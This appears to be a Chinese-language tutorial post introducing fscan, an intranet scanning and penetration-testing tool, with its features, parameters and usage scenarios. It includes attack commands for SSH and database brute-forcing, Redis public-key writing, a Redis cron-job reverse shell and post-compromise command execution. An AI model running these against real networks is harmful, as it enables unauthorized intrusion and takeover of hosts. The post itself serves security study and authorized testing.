介绍fscan 是一款流行的内网综合扫描工具主要用于内网渗透测试和网络安全评估。它支持一键自动化全方位漏扫扫描功能覆盖广泛。 项目地址https://github.com/shadow1ng/fscan主要功能信息搜集存活探测利用ICMP协议高效检测主机在线状态端口扫描全面扫描开放端口洞察目标系统服务布局爆破功能各类服务爆破SSH、SMB、RDP 等数据库密码爆破MySQL、MSSQL、Redis、PostgreSQL、Oracle 等漏洞扫描NetBIOS 探测、域控识别获取目标网卡信息高危漏洞扫描MS17-010 等Web 探测WebTitle 探测Web 指纹识别CMS、OA 等框架Web 漏洞扫描WebLogic、ST2 等漏洞利用Redis 权限提升写公钥/计划任务SSH 远程命令执行MS17-017 利用使用方法基础用法# 默认全部模块扫描fscan.exe -h 192.168.1.1/24# 跳过存活检测、跳过web poc扫描fscan.exe -h 192.168.1.1/24 -np -no -nopoc# Redis 写入公钥fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub# Redis 计划任务反弹shellfscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666# SSH 爆破成功后执行命令fscan.exe -h 192.168.1.1/24 -c whoami# 指定模块和端口fscan.exe -h 192.168.1.1/24 -m ssh -p 2222# 加载用户名密码文件进行爆破fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt# 扫描URL并设置代理fscan.exe -u http://baidu.com -proxy 8080完整参数参考参数说明-h目标IP-hf从文件读取目标-hn白名单跳过的IP-m扫描模式 (ssh/smb/all)-p指定端口-pa新增扫描端口-np跳过存活探测-nopoc跳过web poc扫描-nobr跳过密码爆破-no不保存结果文件参数说明-o结果保存位置-c爆破成功后执行的命令-pwd指定密码-pwdf密码文件-user指定用户名-userf用户名文件-rfRedis写公钥的文件-rsRedis计划任务反弹shell的IP:端口-proxy设置HTTP代理-ping使用ping代替ICMP存活探测参数说明-pocname指定web poc名字-pocpath指定poc路径-t扫描线程数-time端口扫描超时-wtweb访问超时-debug无响应时打印进度-silent静默扫描-sshkey指定SSH私钥-domainSMB爆破模块设置域名-socks5指定socks5代理典型使用场景场景1内网主机发现fscan.exe -h 192.168.1.1/24场景2快速扫描跳过部分模块fscan.exe -h 192.168.1.1/24 -np -no -nopoc场景3Redis 权限提升# 写入公钥fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub# 反弹shellfscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666场景4针对性服务爆破fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 -pwdf pwd.txt注意事项⚠️该工具仅供安全研究与教学使用未经授权对目标系统进行扫描是违法行为。